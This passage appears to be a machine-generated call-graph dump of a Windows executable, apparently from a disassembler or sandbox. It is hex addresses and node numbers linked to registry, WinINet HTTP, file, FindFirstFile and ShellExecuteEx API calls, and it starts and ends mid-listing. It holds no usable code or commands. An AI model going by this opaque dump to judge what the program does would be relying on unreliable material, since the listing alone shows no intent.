10eab0 74566->74569 74567->74547 74570 10e7bd 74567->74570 74572 10e698 RegSetValueExW 74568->74572 74573 10e6ae 74568->74573 74577 d9490 42 API calls 74570->74577 74574 10e999 74571->74574 74572->74573 74573->74546 74575 10e6b9 RegCloseKey 74573->74575 74576 10ea42 74574->74576 74578 d43d0 56 API calls 74574->74578 74575->74546 74660 167376 74576->74660 74579 10e7db RegCreateKeyExW 74577->74579 74581 10e9c6 74578->74581 74582 10e80e RegQueryValueExW 74579->74582 74585 10e861 74579->74585 74581->74562 74584 10e9d0 74581->74584 74582->74585 74588 10e82b 74582->74588 74583 10eaa0 74586 d9490 42 API calls 74584->74586 74585->74563 74587 10e893 RegCloseKey 74585->74587 74589 10e9f3 RegCreateKeyExW 74586->74589 74587->74563 74588->74585 74592 10e841 RegQueryValueExW 74588->74592 74590 10ea30 74589->74590 74591 10ea1d RegSetValueExW 74589->74591 74590->74576 74593 10ea3b RegCloseKey 74590->74593 74591->74590 74592->74585 74593->74576 74595 d445c 74594->74595 74596 d4408 74594->74596 74608 d44e7 74595->74608 74670 1674da 6 API calls 74595->74670 74667 1674da 6 API calls 74596->74667 74599 d4412 74599->74595 74601 d441e GetProcessHeap 74599->74601 74600 d4476 74600->74608 74671 1677ec 44 API calls 74600->74671 74668 1677ec 44 API calls 74601->74668 74604 d444b 74669 167490 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 74604->74669 74605 d44d6 74672 167490 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 74605->74672 74608->74486 74608->74487 74610 d257d 74609->74610 74673 1695aa 74610->74673 74612 d258a 74613 d2570 42 API calls 74612->74613 74614 d259a ctype 74613->74614 74615 d25fe 74614->74615 74618 d25ba _LStrxfrm 74614->74618 74620 d263f 74614->74620 74676 16c8ad 14 API calls __dosmaperr 74615->74676 74617 d2603 74677 16c7af 41 API calls __wsopen_s 74617->74677 74618->74489 74620->74618 74678 16c8ad 14 API calls __dosmaperr 74620->74678 74621 d260e 74621->74489 74623 d2648 74679 16c7af 41 API calls __wsopen_s 74623->74679 74626 10fb62 74625->74626 74627 10fa9d 74625->74627 74626->74510 74628 10faa5 74627->74628 74629 10fabc 74627->74629 74680 d8750 74628->74680 74631 10fac1 74629->74631 74632 10fad8 74629->74632 74636 d8750 69 API calls 74631->74636 74633 10faf4 74632->74633 74634 10fadd 74632->74634 74638 10fb10 74633->74638 74639 10faf9 74633->74639 74637 d8750 69 API calls 74634->74637 74640 10fad0 74636->74640 74641 10faec 74637->74641 74643 10fb15 74638->74643 74644 10fb2a 74638->74644 74642 d8750 69 API calls 74639->74642 74640->74510 74641->74510 74645 10fb08 74642->74645 74683 d35e0 42 API calls 4 library calls 74643->74683 74647 10fb46 74644->74647 74648 10fb2f 74644->74648 74645->74510 74647->74626 74651 d8750 69 API calls 74647->74651 74650 d8750 69 API calls 74648->74650 74649 10fb25 74649->74510 74652 10fb3e 74650->74652 74653 10fb5a 74651->74653 74652->74510 74653->74510 74655 d94f3 74654->74655 74656 d94a6 74654->74656 74655->74536 74659 d94b6 74656->74659 74729 d35e0 42 API calls 4 library calls 74656->74729 74658 d94eb 74658->74536 74659->74536 74661 16737e 74660->74661 74662 16737f IsProcessorFeaturePresent 74660->74662 74661->74583 74664 16788a 74662->74664 74730 16784d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 74664->74730 74666 16796d 74666->74583 74667->74599 74668->74604 74669->74595 74670->74600 74671->74605 74672->74608 74674 1695c4 74673->74674 74675 1695f1 RaiseException 74673->74675 74674->74675 74675->74612 74676->74617 74677->74621 74678->74623 74679->74618 74684 d2ea0 74680->74684 74682 d8763 74682->74510 74683->74649 74685 d2ed3 _swprintf 74684->74685 74701 d2fb1 74684->74701 74703 170f43 45 API calls _swprintf 74685->74703 74686 d2570 42 API calls 74687 d3003 74686->74687 74689 d2570 42 API calls 74687->74689 74691 d300d ctype 74689->74691 74690 d43d0 56 API calls 74693 d2f21 74690->74693 74691->74682 74692 d2ef3 74692->74687 74692->74690 74692->74693 74693->74687 74704 d3470 74693->74704 74695 d2f6f 74696 d2f91 74695->74696 74722 d23b0 41 API calls 74695->74722 74723 170f84 45 API calls _swprintf 74696->74723 74701->74686 74702 d2fbb 74701->74702 74702->74682 74703->74692 74705 d3483 74704->74705 74718 d2f4d 74704->74718 74705->74718 74724 d3eb0 50 API calls 74705->74724 74707 d3498 74708 d349e FindResourceW 74707->74708 74707->74718 74709 d34b2 74708->74709 74708->74718 74725 d3f70 LoadResource LockResource SizeofResource 74709->74725 74711 d34bc 74712 d34e3 74711->74712 74711->74718 74726 d23b0 41 API calls 74711->74726 74727 16cb92 41 API calls 3 library calls 74712->74727 74715 d34f3 74728 d4010 42 API calls 74715->74728 74717 d34f9 74717->74718 74719 d2570 42 API calls 74717->74719 74718->74695 74721 d35e0 42 API calls 4 library calls 74718->74721 74720 d3522 74719->74720 74721->74695 74722->74696 74723->74701 74724->74707 74725->74711 74726->74712 74727->74715 74728->74717 74729->74658 74730->74666 74731 100c90 74870 104dc0 74731->74870 74733 100cda 74734 d9490 42 API calls 74733->74734 74735 100ceb 74734->74735 74736 d9490 42 API calls 74735->74736 74737 100cf7 74736->74737 74885 d2420 74737->74885 74739 100da7 74742 f9890 57 API calls 74739->74742 74740 100dea 74896 102420 CreateEventW 74740->74896 74745 100f0a 74742->74745 74743 100dfe 74747 100e08 74743->74747 74763 10100c 74743->74763 74744 1016d7 74746 d2570 42 API calls 74744->74746 74749 100ff4 74745->74749 74755 f9890 57 API calls 74745->74755 74750 1016e1 74746->74750 74909 f9890 74747->74909 74748 100d53 InternetCrackUrlW 74753 100d97 GetLastError 74748->74753 74754 100d06 74748->74754 74931 105340 143 API calls 74749->74931 74756 d2570 42 API calls 74750->74756 74753->74739 74753->74754 74754->74739 74754->74740 74754->74744 74754->74748 74760 100f19 74755->74760 74761 1016eb 74756->74761 74757 101007 74767 167376 CatchGuardHandler 5 API calls 74757->74767 74759 101671 74932 105340 143 API calls 74759->74932 74760->74749 74766 f9890 57 API calls 74760->74766 74764 d2570 42 API calls 74761->74764 74763->74759 74763->74761 74773 10107e 74763->74773 74768 1016f5 74764->74768 74765 f9890 57 API calls 74769 100e1c 74765->74769 74771 100f28 74766->74771 74772 1016d1 74767->74772 74769->74757 74777 f9890 57 API calls 74769->74777 74774 d43d0 56 API calls 74771->74774 74775 101092 CreateFileW 74773->74775 74776 101116 74773->74776 74778 100f2f 74774->74778 74779 1010d9 GetFileSize 74775->74779 74783 1010c8 74775->74783 74780 d43d0 56 API calls 74776->74780 74781 100e2b 74777->74781 74778->74750 74788 d2420 42 API calls 74778->74788 74779->74783 74784 101131 74780->74784 74785 d43d0 56 API calls 74781->74785 74782 101100 CloseHandle 74786 101110 74782->74786 74783->74782 74783->74786 74784->74750 74905 102750 74784->74905 74787 100e32 74785->74787 74786->74776 74787->74750 74792 d2420 42 API calls 74787->74792 74789 100f62 74788->74789 74790 d43d0 56 API calls 74789->74790 74793 100f67 74790->74793 74796 100e65 74792->74796 74793->74750 74797 100f71 74793->74797 74794 10116c 74795 1054e0 223 API calls 74794->74795 74798 101184 74795->74798 74799 d43d0 56 API calls 74796->74799 74807 d2420 42 API calls 74797->74807 74800 101281 74798->74800 74801 10118c 74798->74801 74802 100e6a 74799->74802 74803 1013d7 74800->74803 74804 101289 74800->74804 74805 f9890 57 API calls 74801->74805 74802->74750 74806 100e74 74802->74806 74810 10149f 74803->74810 74821 101446 74803->74821 74808 f9890 57 API calls 74804->74808 74809 101191 74805->74809 74819 d2420 42 API calls 74806->74819 74811 100f97 74807->74811 74812 10128e 74808->74812 74817 f9890 57 API calls 74809->74817 74847 101277 InternetSetStatusCallbackW InternetCloseHandle 74809->74847 74813 101562 74810->74813 74814 1014ac 74810->74814 74930 f9bd0 143 API calls 74811->74930 74816 10137c 74812->74816 74823 f9890 57 API calls 74812->74823 74820 101700 267 API calls 74813->74820 74818 d1e40 178 API calls 74814->74818 74828 de650 57 API calls 74816->74828 74816->74847 74824 1011a3 74817->74824 74825 101549 74818->74825 74826 100e9a 74819->74826 74837 10146f 74820->74837 74827 de650 57 API calls 74821->74827 74822 100fae 74822->74749 74829 1012a0 74823->74829 74833 f9890 57 API calls 74824->74833 74824->74847 74825->74837 74929 f9bd0 143 API calls 74826->74929 74831 101457 74827->74831 74832 101399 74828->74832 74829->74816 74841 f9890 57 API calls 74829->74841 74836 105340 143 API calls 74831->74836 74840 105340 143 API calls 74832->74840 74842 1011b2 74833->74842 74834 1015a2 ResetEvent 74843 1015b8 InternetCloseHandle 74834->74843 74844 1015c9 WaitForSingleObject WaitForSingleObject 74834->74844 74835 1015e3 74838 1015fb InternetCloseHandle 74835->74838 74839 10160c InternetSetStatusCallbackW InternetCloseHandle 74835->74839 74836->74837 74837->74834 74837->74835 74838->74839 74839->74847 74840->74847 74845 1012af 74841->74845 74846 d43d0 56 API calls 74842->74846 74843->74844 74844->74835 74848 d43d0 56 API calls 74845->74848 74849 1011b9 74846->74849 74847->74757 74851 1012ba 74848->74851 74849->74750 74852 d2420 42 API calls 74849->74852 74850 100eb1 74850->74757 74851->74750 74853 d2420 42 API calls 74851->74853 74854 1011e9 74852->74854 74855 1012ea 74853->74855 74856 d43d0 56 API calls 74854->74856 74857 d43d0 56 API calls 74855->74857 74858 1011ee 74856->74858 74859 1012ef 74857->74859 74858->74750 74860 1011f8 74858->74860 74859->74750 74861 1012f9 74859->74861 74862 d2420 42 API calls 74860->74862 74863 d2420 42 API calls 74861->74863 74864 10121e 74862->74864 74865 10131f 74863->74865 74866 f9bd0 143 API calls 74864->74866 74867 f9bd0 143 API calls 74865->74867 74868 101235 74866->74868 74869 10133a 74867->74869 74868->74847 74869->74816 74871 104df5 74870->74871 74884 104e1f _LStrxfrm 74870->74884 74933 d9060 74871->74933 74873 104f2d 74873->74733 74874 104dfa _Maklocstr 74874->74873 74875 104f43 74874->74875 74938 d9100 42 API calls _Maklocstr 74874->74938 74876 d2570 42 API calls 74875->74876 74878 104f4d 74876->74878 74879 104f68 74878->74879 74880 104f5a InternetCloseHandle 74878->74880 74879->74733 74880->74879 74882 16c8ad 14 API calls std::_Stodx_v2 74882->74884 74883 16c7af 41 API calls __wsopen_s 74883->74884 74884->74874 74884->74882 74884->74883 74937 d4010 42 API calls 74884->74937 74888 d2446 ___crtCompareStringW 74885->74888 74891 d24b1 _LStrxfrm 74885->74891 74886 d2570 42 API calls 74887 d24fc 74886->74887 74887->74754 74888->74891 74894 d2490 ctype 74888->74894 74940 d23b0 41 API calls 74888->74940 74890 d24df 74890->74754 74891->74886 74891->74890 74893 d24cd 74942 16c7af 41 API calls __wsopen_s 74893->74942 74894->74891 74941 16c8ad 14 API calls __dosmaperr 74894->74941 74897 102446 CreateEventW 74896->74897 74898 10243a 74896->74898 74899 10245b 74897->74899 74898->74897 74900 102474 InternetOpenW 74899->74900 74943 d22b0 41 API calls 4 library calls 74899->74943 74902 1024b7 InternetSetStatusCallbackW 74900->74902 74903 1024ae GetLastError 74900->74903 74902->74743 74903->74743 74906 10279d 74905->74906 74907 d2570 42 API calls 74906->74907 74908 102953 74907->74908 74910 f98cc 74909->74910 74928 f99da 74909->74928 74944 1674da 6 API calls 74910->74944 74912 f98d6 74913 d43d0 56 API calls 74912->74913 74912->74928 74916 f9927 74913->74916 74914 f99f1 74915 d2570 42 API calls 74914->74915 74917 f99fb 74915->74917 74916->74914 74918 d43d0 56 API calls 74916->74918 74919 f9950 74918->74919 74919->74914 74920 d43d0 56 API calls 74919->74920 74921 f9979 74920->74921 74921->74914 74922 f997f 74921->74922 74945 d35e0 42 API calls 4 library calls 74922->74945 74924 f99bb 74946 1677ec 44 API calls 74924->74946 74926 f99c9 74947 167490 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 74926->74947 74928->74757 74928->74765 74929->74850 74930->74822 74931->74757 74932->74847 74934 d908c 74933->74934 74935 d90c9 74933->74935 74939 1712b1 14 API calls ___free_lconv_mon 74934->74939 74935->74874 74937->74884 74938->74874 74939->74935 74940->74894 74941->74893 74942->74891 74943->74900 74944->74912 74945->74924 74946->74926 74947->74928 74948 103480 75003 1040a0 ResetEvent InternetConnectW 74948->75003 74950 103f82 74951 1034d2 74951->74950 74952 103544 HttpOpenRequestW 74951->74952 74953 d2420 42 API calls 74951->74953 74955 1035de 74952->74955 74956 1035af 74952->74956 74953->74952 74958 d43d0 56 API calls 74955->74958 74993 1035e0 InternetSetStatusCallbackW 74955->74993 74956->74955 74956->74993 75010 1054e0 74956->75010 74962 10369a 74958->74962 74960 103f9e 74961 d2570 42 API calls 74960->74961 74962->74960 74963 d43d0 56 API calls 74962->74963 74976 1036ff 74962->74976 74966 1036c2 74963->74966 74965 d43d0 56 API calls 74972 1037c6 74965->74972 74966->74960 74970 d8750 69 API calls 74966->74970 74967 103731 74968 d43d0 56 API calls 74967->74968 74969 10373a 74968->74969 74969->74960 74978 d8750 69 API calls 74969->74978 74973 1036ed 74970->74973 74971 103829 74977 d43d0 56 API calls 74971->74977 75000 103887 74971->75000 74972->74960 74972->74971 74974 d2420 42 API calls 74972->74974 74975 d2420 42 API calls 74973->74975 74979 1037fc 74974->74979 74975->74976 74986 103778 74976->74986 75037 ddee0 69 API calls CatchGuardHandler 74976->75037 74980 103846 74977->74980 74981 103766 74978->74981 75038 dd7b0 44 API calls _swprintf 74979->75038 74980->74960 74988 d8750 69 API calls 74980->74988 74983 d2420 42 API calls 74981->74983 74983->74986 74984 10380f 74984->74971 75039 d49b0 41 API calls 4 library calls 74984->75039 74985 1038e6 HttpSendRequestW 74985->75000 74986->74965 74989 103875 74988->74989 74990 d2420 42 API calls 74989->74990 74990->75000 74991 1054e0 223 API calls 74991->75000 74992 d8240 RaiseException EnterCriticalSection LeaveCriticalSection 74992->75000 74993->74950 74994 103f0c InternetCloseHandle 74994->74993 74996 d2420 42 API calls 74996->75000 74999 d43d0 56 API calls 74999->75000 75000->74960 75000->74985 75000->74991 75000->74992 75000->74996 75000->74999 75002 103d77 75000->75002 75040 1048b0 71 API calls 75000->75040 75041 104b80 68 API calls ctype 75000->75041 75042 104a30 143 API calls 75000->75042 75043 105340 143 API calls 75000->75043 75002->74993 75002->74994 75004 104130 SetEvent 75003->75004 75005 1040e0 GetLastError 75003->75005 75008 104119 75004->75008 75007 1040ed 75005->75007 75005->75008 75006 1054e0 223 API calls 75006->75007 75007->75006 75007->75008 75009 10410c WaitForSingleObject 75007->75009 75008->74951 75009->75007 75009->75008 75011 105510 75010->75011 75012 1055f5 75010->75012 75013 f9890 57 API calls 75011->75013 75012->74956 75014 105515 75013->75014 75015 1055e3 75014->75015 75016 f9890 57 API calls 75014->75016 75015->74956 75017 105524 75016->75017 75017->75015 75018 f9890 57 API calls 75017->75018 75019 105533 75018->75019 75020 d43d0 56 API calls 75019->75020 75021 10553a 75020->75021 75022 105542 75021->75022 75023 105624 75021->75023 75027 d2420 42 API calls 75022->75027 75024 d2570 42 API calls 75023->75024 75025 10562e 75024->75025 75045 105660 149 API calls 75025->75045 75028 105565 75027->75028 75030 d43d0 56 API calls 75028->75030 75029 105651 75029->74956 75031 10556a 75030->75031 75031->75023 75032 105572 75031->75032 75033 d2420 42 API calls 75032->75033 75034 105592 75033->75034 75044 f9bd0 143 API calls 75034->75044 75036 1055a3 75036->75015 75037->74967 75038->74984 75039->74971 75040->75000 75041->75000 75042->75000 75043->75000 75044->75036 75045->75029 75046 12b6a0 75049 116c80 CreateFileW 75046->75049 75050 116ce4 ReadFile 75049->75050 75051 116cda GetLastError 75049->75051 75052 116d04 75050->75052 75053 116cfa GetLastError 75050->75053 75051->75052 75054 116d26 75052->75054 75055 116d18 CloseHandle 75052->75055 75053->75052 75055->75054 75056 14d3b0 75096 dea60 75056->75096 75059 14d3e6 75060 14d40d 75061 118eb0 89 API calls 75060->75061 75062 14d41e 75061->75062 75063 14d47c 75146 d8e70 14 API calls __freea 75063->75146 75064 14d423 75064->75063 75099 12b6e0 75064->75099 75066 14d484 75147 1405e0 14 API calls 2 library calls 75066->75147 75067 14d44e 75067->75063 75069 14d452 75067->75069 75133 118eb0 75069->75133 75072 14d530 75150 14df70 43 API calls __cftoe 75072->75150 75074 14d7ba 75076 d2570 42 API calls 75074->75076 75075 14d537 75151 14e0e0 43 API calls 2 library calls 75075->75151 75078 14d7c4 75076->75078 75080 d2570 42 API calls 75078->75080 75079 14d5c3 75081 14d5cf GetSystemMetrics GetSystemMetrics 75079->75081 75089 14d5ed 75079->75089 75082 14d7ce 75080->75082 75081->75089 75083 14d48c 75083->75072 75083->75074 75087 14d793 75083->75087 75148 14dc50 103 API calls CatchGuardHandler 75083->75148 75149 14d7e0 141 API calls 3 library calls 75083->75149 75084 14e280 43 API calls 75092 14d53e 75084->75092 75088 d9060 std::generic_category 14 API calls 75087->75088 75088->75062 75089->75074 75090 14d68e 75089->75090 75153 132fd0 61 API calls 3 library calls 75089->75153 75090->75074 75090->75087 75094 d9100 42 API calls 75090->75094 75092->75074 75092->75078 75092->75079 75092->75084 75152 1710c3 42 API calls 3 library calls 75092->75152 75094->75090 75154 deaa0 75096->75154 75100 d25a0 75099->75100 75101 12b71b CreateFileW 75100->75101 75102 12b761 75101->75102 75106 12b86d 75101->75106 75103 12b84f ReadFile 75102->75103 75104 12b76d SetFilePointer ReadFile 75102->75104 75105 12b874 75103->75105 75103->75106 75107 12b7a5 75104->75107 75108 12b79e 75104->75108 75105->75106 75112 d43d0 56 API calls 75105->75112 75109 12b95b 75106->75109 75110 12b94d CloseHandle 75106->75110 75107->75108 75113 d43d0 56 API calls 75107->75113 75108->75106 75111 167376 CatchGuardHandler 5 API calls 75109->75111 75110->75109 75114 12b994 75111->75114 75115 12b886 75112->75115 75116 12b7b7 75113->75116 75114->75067 75117 12b99a 75115->75117 75121 d3470 51 API calls 75115->75121 75116->75117 75122 d3470 51 API calls 75116->75122 75118 d2570 42 API calls 75117->75118 75119 12b9a4 75118->75119 75120 d43d0 56 API calls 75119->75120 75123 12b9db 75120->75123 75124 12b8ab 75121->75124 75129 12b7dc 75122->75129 75127 d2570 42 API calls 75123->75127 75132 12b9e1 75123->75132 75126 12b8bb 75124->75126 75168 dd350 75124->75168 75125 12b802 75125->75108 75125->75117 75126->75106 75126->75117 75130 12ba50 75127->75130 75129->75125 75167 d35e0 42 API calls 4 library calls 75129->75167 75132->75067 75134 d43d0 56 API calls 75133->75134 75135 118eea 75134->75135 75136 118f6b 75135->75136 75139 118ef0 75135->75139 75137 d2570 42 API calls 75136->75137 75138 118f75 75137->75138 75140 d3470 51 API calls 75139->75140 75141 118f0f 75140->75141 75142 118f22 75141->75142 75306 d35e0 42 API calls 4 library calls 75141->75306 75179 10ef20 75142->75179 75144 118f33 75146->75066 75147->75083 75148->75083 75149->75083 75150->75075 75151->75092 75152->75092 75153->75089 75158 deae4 75154->75158 75165 deadc 75154->75165 75155 167376 CatchGuardHandler 5 API calls 75157 dea88 75155->75157 75156 debd1 75159 d2570 42 API calls 75156->75159 75157->75059 75157->75060 75157->75064 75158->75156 75161 deb14 ctype 75158->75161 75158->75165 75160 debdb 75159->75160 75162 deb32 FindFirstFileW 75161->75162 75161->75165 75163 deb7e GetLastError 75162->75163 75164 deb61 75162->75164 75163->75164 75164->75165 75166 deb9b FindClose 75164->75166 75165->75155 75166->75165 75167->75125 75169 dd35d MultiByteToWideChar 75168->75169 75170 dd3ba 75168->75170 75169->75170 75171 dd375 75169->75171 75170->75126 75172 dd390 MultiByteToWideChar 75171->75172 75178 d23b0 41 API calls 75171->75178 75174 dd3c9 75172->75174 75175 dd3a7 75172->75175 75176 d2570 42 API calls 75174->75176 75175->75126 75177 dd3d3 75176->75177 75178->75172 75180 d43d0 56 API calls 75179->75180 75181 10ef4f 75180->75181 75182 10f114 75181->75182 75186 10fa90 69 API calls 75181->75186 75183 d2570 42 API calls 75182->75183 75184 10f11e 75183->75184 75185 d43d0 56 API calls 75184->75185 75187 10f14f 75185->75187 75188 10ef79 75186->75188 75189 10f2f3 75187->75189 75196 10fa90 69 API calls 75187->75196 75190 10ef80 75188->75190 75192 d43d0 56 API calls 75188->75192 75191 d2570 42 API calls 75189->75191 75190->75144 75194 10f2fd 75191->75194 75193 10efa3 75192->75193 75193->75182 75195 10efad 75193->75195 75197 d43d0 56 API calls 75194->75197 75202 d9490 42 API calls 75195->75202 75198 10f179 75196->75198 75199 10f32f 75197->75199 75201 10f180 75198->75201 75204 d43d0 56 API calls 75198->75204 75200 10f445 75199->75200 75208 10fa90 69 API calls 75199->75208 75203 d2570 42 API calls 75200->75203 75201->75144 75205 10efcb RegOpenKeyExW 75202->75205 75206 10f44f 75203->75206 75207 10f1a3 75204->75207 75209 10efed RegQueryValueExW 75205->75209 75243 10f053 75205->75243 75210 d43d0 56 API calls 75206->75210 75207->75189 75211 10f1ad 75207->75211 75212 10f359 75208->75212 75213 10f00e 75209->75213 75209->75243 75214 10f47f 75210->75214 75218 d9490 42 API calls 75211->75218 75216 10f360 75212->75216 75220 d43d0 56 API calls 75212->75220 75224 10f02b RegQueryValueExW 75213->75224 75213->75243 75217 10f593 75214->75217 75225 10fa90 69 API calls 75214->75225 75215 10f074 RegCloseKey 75215->75190 75216->75144 75219 d2570 42 API calls 75217->75219 75221 10f1cb RegOpenKeyExW 75218->75221 75222 10f59d 75219->75222 75223 10f383 75220->75223 75226 10f1f9 RegQueryValueExW 75221->75226 75235 10f267 75221->75235 75227 d43d0 56 API calls 75222->75227 75223->75200 75228 10f38b 75223->75228 75229 10f0d8 75224->75229 75224->75243 75230 10f4a9 75225->75230 75226->75235 75242 10f216 75226->75242 75231 10f5cf 75227->75231 75238 d9490 42 API calls 75228->75238 75316 d35e0 42 API calls 4 library calls 75229->75316 75232 10f4b0 75230->75232 75236 d43d0 56 API calls 75230->75236 75233 10f714 75231->75233 75234 10f5d9 75231->75234 75232->75144 75239 d2570 42 API calls 75233->75239 75247 10fa90 69 API calls 75234->75247 75235->75201 75240 10f28f RegCloseKey 75235->75240 75241 10f4d3 75236->75241 75244 10f3ab RegOpenKeyExW 75238->75244 75245 10f71e 75239->75245 75240->75201 75241->75217 75246 10f4db 75241->75246 75242->75235 75251 10f22c RegQueryValueExW 75242->75251 75243->75190 75243->75215 75318 d8a60 57 API calls 4 library calls 75244->75318 75249 d2570 42 API calls 75245->75249 75259 d9490 42 API calls 75246->75259 75252 10f5f9 75247->75252 75250 10f728 75249->75250 75255 d43d0 56 API calls 75250->75255 75251->75235 75256 10f24c 75251->75256 75257 d8770 58 API calls 75252->75257 75283 10f600 75252->75283 75253 10f3d4 75253->75216 75254 10f3e1 RegCloseKey 75253->75254 75254->75216 75258 10f75f 75255->75258 75256->75235 75317 dceb0 43 API calls 5 library calls 75256->75317 75268 10f617 75257->75268 75260 10f828 75258->75260 75261 10f769 75258->75261 75262 10f4fb RegOpenKeyExW 75259->75262 75263 d2570 42 API calls 75260->75263 75269 10fa90 69 API calls 75261->75269 75319 d8be0 66 API calls 5 library calls 75262->75319 75266 10f832 75263->75266 75270 d43d0 56 API calls 75266->75270 75267 10f522 75267->75232 75271 10f52f RegCloseKey 75267->75271 75268->75245 75274 10f657 75268->75274 75275 10f646 RegDeleteValueW 75268->75275 75272 10f789 75269->75272 75273 10f86f 75270->75273 75271->75232 75276 10f790 75272->75276 75281 d8770 58 API calls 75272->75281 75277 10f943 75273->75277 75278 10f879 75273->75278 75280 10f6aa RegCloseKey 75274->75280 75274->75283 75275->75268 75276->75144 75279 d2570 42 API calls 75277->75279 75286 10fa90 69 API calls 75278->75286 75282 10f94d 75279->75282 75280->75283 75284 10f7a4 75281->75284 75285 d43d0 56 API calls 75282->75285 75283->75144 75284->75276 75290 10f7c4 RegCloseKey 75284->75290 75287 10f97f 75285->75287 75288 10f899 75286->75288 75289 10fa84 75287->75289 75295 10f989 75287->75295 75296 10f8a0 75288->75296 75307 d8770 75288->75307 75292 d2570 42 API calls 75289->75292 75290->75276 75293 10fa8e 75292->75293 75294 10f8b4 75297 10f8c3 RegDeleteValueW 75294->75297 75298 10f8bf 75294->75298 75299 10fa90 69 API calls 75295->75299 75296->75144 75297->75298 75298->75296 75301 10f8df RegCloseKey 75298->75301 75300 10f9a9 75299->75300 75302 10f9b0 75300->75302 75303 d8770 58 API calls 75300->75303 75301->75296 75302->75144 75304 10f9c7 75303->75304 75304->75302 75305 10fa20 RegCloseKey 75304->75305 75305->75302 75306->75142 75308 d43d0 56 API calls 75307->75308 75309 d87b7 75308->75309 75310 d880c 75309->75310 75312 d87bd 75309->75312 75311 d2570 42 API calls 75310->75311 75313 d8816 75311->75313 75314 d9490 42 API calls 75312->75314 75315 d87dd RegOpenKeyExW 75314->75315 75315->75294 75316->75243 75317->75256 75318->75253 75319->75267 75320 167c2d 75321 167c39 ___scrt_is_nonwritable_in_current_image 75320->75321 75346 167626 75321->75346 75323 167c40 75324 167d93 75323->75324 75333 167c6a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 75323->75333 75406 168138 4 API calls 2 library calls 75324->75406 75326 167d9a 75399 178ead 75326->75399 75330 167da8 75331 167c89 75332 167d0a 75354 168253 GetStartupInfoW ctype 75332->75354 75333->75331 75333->75332 75402 178e87 41 API calls 4 library calls 75333->75402 75335 167d10 75355 141380 75335->75355 75340 167d2c 75340->75326 75341 167d30 75340->75341 75342 167d39 75341->75342 75404 178e62 23 API calls CallUnexpected 75341->75404 75405 167797 77 API calls ___scrt_uninitialize_crt 75342->75405 75345 167d41 75345->75331 75347 16762f 75346->75347 75408 167dec IsProcessorFeaturePresent 75347->75408 75349 16763b 75409 16b0bd 10 API calls 2 library calls 75349->75409 75351 167640 75353 167644 75351->75353 75410 16b0dc 7 API calls 2 library calls 75351->75410 75353->75323 75354->75335 75411 140b40 75355->75411 75375 141532 LeaveCriticalSection 75378 141558 75375->75378 75391 14157a ctype 75375->75391 75376 1414ea 75379 141500 75376->75379 75380 1414f0 DestroyWindow 75376->75380 75381 141564 75378->75381 75590 1712b1 14 API calls ___free_lconv_mon 75378->75590 75379->75375 75383 141510 ctype 75379->75383 75589 1712b1 14 API calls ___free_lconv_mon 75379->75589 75380->75379 75381->75391 75591 1712b1 14 API calls ___free_lconv_mon 75381->75591 75383->75375 75390 167376 CatchGuardHandler 5 API calls 75392 14161f 75390->75392 75582 141ea0 75391->75582 75403 168289 GetModuleHandleW 75392->75403 77506 178c95 75399->77506 75402->75332 75403->75340 75404->75342 75405->75345 75406->75326 75407 178e71 23 API calls CallUnexpected 75407->75330 75408->75349 75409->75351 75410->75353 75617 140f90 GetModuleFileNameW 75411->75617 75413 140b81 75414 dea60 45 API calls 75413->75414 75415 140b90 75414->75415 75416 140c00 75415->75416 75417 140bb1 75415->75417 75420 140c20 GetModuleHandleW 75416->75420 75686 141090 88 API calls 2 library calls 75417->75686 75419 140bb9 75421 d9490 42 API calls 75419->75421 75422 140c54 75420->75422 75423 140c8c 75420->75423 75424 140bc6 MoveFileW 75421->75424 75687 1674da 6 API calls 75422->75687 75427 140ce4 75423->75427 75689 1674da 6 API calls 75423->75689 75429 dea60 45 API calls 75424->75429 75447 140d3c 75427->75447 75691 1674da 6 API calls 75427->75691 75428 140c5e 75428->75423 75431 140c6a GetProcAddress 75428->75431 75432 140bf8 75429->75432 75688 167490 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 75431->75688 75432->75416 75437 140f81 75432->75437 75433 140cb6 75433->75427 75438 140cc2 GetProcAddress 75433->75438 75436 140c89 75436->75423 75440 178ead 23 API calls 75437->75440 75690 167490 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 75438->75690 75439 140d0e 75442 140d1a GetProcAddress 75439->75442 75439->75447 75443 140f8b 75440->75443 75692 167490 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 75442->75692 75445 140ce1 75445->75427 75449 140f15 75447->75449 75658 d82f0 GetSystemDirectoryW 75447->75658 75448 140d39 75448->75447 75680 141b10 75449->75680 75452 167376 CatchGuardHandler 5 API calls 75453 140f79 CoInitializeEx DefWindowProcW InitCommonControlsEx LoadLibraryW 75452->75453 75454 141d40 75453->75454 75455 141d84 75454->75455 75456 141d9d GetCurrentThreadId 75454->75456 75455->75456 75715 16780f 75456->75715 75540 138bf4 75542 f9890 57 API calls 75540->75542 75541 138ba6 ShellExecuteExW 75541->75540 75544 138bf9 75542->75544 75546 f9890 57 API calls 75544->75546 75552 138ce9 75544->75552 75545 138d23 75572 141640 75545->75572 75547 138c08 75546->75547 75548 f9890 57 API calls 75547->75548 75547->75552 75549 138c17 75548->75549 75550 d43d0 56 API calls 75549->75550 75551 138c1e 75550->75551 75553 138d37 75551->75553 75557 d2420 42 API calls 75551->75557 75552->75545 76016 1400d0 150 API calls 75552->76016 75555 d2570 42 API calls 75553->75555 75556 138d41 75555->75556 75558 138c49 75557->75558 76013 f9350 69 API calls 75558->76013 75560 138c54 75561 d2420 42 API calls 75560->75561 75562 138c64 75561->75562 76014 f9350 69 API calls 75562->76014 75564 138c6c 75565 d43d0 56 API calls 75564->75565 75566 138c73 75565->75566 75566->75553 75567 138c7b 75566->75567 75568 d2420 42 API calls 75567->75568 75569 138c9b 75568->75569 76015 f9bd0 143 API calls 75569->76015 75571 138ca9 75571->75552 75573 141695 75572->75573 75574 126e20 4 API calls 75573->75574 75575 1418a4 75574->75575 75576 114e20 14 API calls 75575->75576 75577 1418e9 75576->75577 75578 126620 21 API calls 75577->75578 75579 141a2a 75578->75579 75580 126620 21 API calls 75579->75580 75581 